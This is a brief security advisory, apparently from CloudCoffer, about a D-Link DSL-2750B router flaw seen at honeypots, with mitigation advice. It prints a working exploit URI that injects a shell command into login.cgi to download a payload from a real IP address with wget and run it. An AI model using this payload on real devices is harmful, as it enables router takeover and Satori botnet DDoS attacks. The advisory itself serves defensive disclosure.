D-Link Router Vulnerability

Date of Detection:

2018.5.24

 

Attack Pattern:

  • URI:

          /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

  • Malware:

The malware is placed at this IP address: 185.62.190.191.

 

Target System:

D-Link DSL-2750B

 

Analysis:

Attackers first exploit vulnerable systems and then control them with malware. Failing to validate users’ inputs, the affected routers can be controlled by remote attackers, without credentials.

Due to the fact that no patch from the vendor is available as of now, the attack is widely sent, even though exploits are published in the Internet. Controlled by attackers, there are a variety of malicious codes downloaded by the wget command.

At the honeypots of CloudCoffer, the majority of attacks are trying to infect systems with Satori Malware, which is designed to propagate to other systems through the same vulnerability. Infected devices may be controlled to launched devastating distributed denial-of-service (DDoS) attacks on websites, social media platforms, and bank networks.

The best practice to mitigate these types of issues is to restrict internet users from accessing login.cgi. To secure routers, we generally recommend users to disable remote access, change default login credentials, disable UPnP, and regularly update firmware.